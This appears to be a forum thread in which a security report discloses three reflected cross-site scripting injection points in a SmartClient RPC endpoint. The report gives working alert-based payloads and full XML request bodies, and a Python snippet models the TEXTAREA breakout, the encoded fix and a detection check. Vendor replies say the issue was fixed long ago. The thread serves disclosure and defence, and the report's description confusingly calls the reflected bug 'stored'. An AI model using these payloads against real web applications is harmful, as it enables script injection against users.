
    Reflected Cross Site Scripting

    Potential impact:

    Perform client-side attacks against the users of the web application. An attacker could inject malicious JavaScript code to steal user credentials, steal sensitive data, perform crypto-mining activities, and implement a key logger or an XSS worm.



    Description:

    Stored XSS (also known as persistent) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

    We have detected several user inputs that are not sanitized properly, hence it is possible for a potential attacker to execute JavaScript code in the user's browser.



    Reflected Cross Site Scripting 1:

    These are the details of the injection point:

    URL: https://<host>:6443/bimft/isomorphic/IDACall

    Field: methodName

    Payload: '&lt;/TEXTAREA &gt; &lt;img src=x onerror=alert('boehringer')&gt;&lt;TEXTAREA&gt;



    <transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>isc_builtin</appID><className>builtin</className><methodName>'&lt;/TEXTAREA &gt;&lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;</methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>



    Reflected Cross Site Scripting 2:

    These are the details of the injection point:

    URL: https://<HOST>:6443/bimft/isomorphic/IDACall

    Field: appID

    Payload: &lt;/TEXTAREA &gt; &lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;

    <transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID> &lt;/TEXTAREA &gt;&lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;</appID><className>builtin</className><methodName>loadFile</methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>



    Reflected Cross Site Scripting 3:

    These are the details of the injection point:

    URL: https://<HOST>:6443/bimft/isomorphic/IDACall

    Field: isc_dd

    Payload: ';</script><img+src=""+onerror=alert("RedTeam")><script>var+a='



    In all the cases, an Alert pop-up is triggered by exploiting the vulnerability:

    Triggering Alert pop-up

    See the attachment for the popup triggered.
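Added example, not taken from the report or from SmartClient's code: a small Python model of the TEXTAREA reflection behind the three findings, using the payload posted above, beside the entity-encoded rendering that closes the hole, with a check that tells the two apart. The page template, the function names and the use of html.unescape() to stand in for the XML parser's entity decoding are assumptions.

```python
import html
import re

# Payload copied from the report in its XML-entity-encoded form; an XML parser
# decodes &lt; and &gt; before the value reaches the application, which is what
# html.unescape() stands in for here (assumption, not the product's own code).
REPORTED_PAYLOAD = html.unescape(
    "&lt;/TEXTAREA &gt; &lt;img src=x onerror=alert('RedTeam')&gt;&lt;TEXTAREA&gt;"
)

# Hypothetical page template (not SmartClient's own code): the RPC field is
# reflected into a TEXTAREA, which browsers parse as RCDATA. RCDATA ends at the
# first "</textarea" the tokenizer sees, so an unencoded value can close it.
TEMPLATE = '<html><body><TEXTAREA name="methodName">{value}</TEXTAREA></body></html>'


def render_vulnerable(method_name: str) -> str:
    # Reflects the value verbatim: the reported payload closes the TEXTAREA early.
    return TEMPLATE.format(value=method_name)


def render_hardened(method_name: str) -> str:
    # Entity-encode < > & " ' so no tag boundary can be formed inside RCDATA.
    return TEMPLATE.format(value=html.escape(method_name, quote=True))


def injected_tags(page: str, expected_tail=("body", "html")) -> list:
    """Return tag names that appear after the FIRST </textarea terminator but are
    not the template's own closing tags. A non-empty list means the reflected
    value escaped the TEXTAREA context and a browser would parse it as markup."""
    start = re.search(r"<textarea[^>]*>", page, re.I)
    if not start:
        return []
    body = page[start.end():]
    close = re.search(r"</textarea\s*>", body, re.I)
    if not close:
        return ["<unterminated textarea>"]
    tail = body[close.end():]
    tags = re.findall(r"<\s*/?\s*([A-Za-z][\w-]*)", tail)
    return [t for t in tags if t.lower() not in expected_tail]


def is_safe(method_name: str, renderer) -> bool:
    # True when the rendered page contains only the template's own tags.
    return not injected_tags(renderer(method_name))


if __name__ == "__main__":
    print("vulnerable:", injected_tags(render_vulnerable(REPORTED_PAYLOAD)))
    print("hardened:  ", injected_tags(render_hardened(REPORTED_PAYLOAD)))
```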

    #2
    Looong since fixed, please do not security test unpatched software!



      #3
      Can you let us know in which version of SmartClient this issue is fixed? We are planning to upgrade to v12.1.



        #4
        All versions that aren't end-of-lifed, which of course includes 12.1.
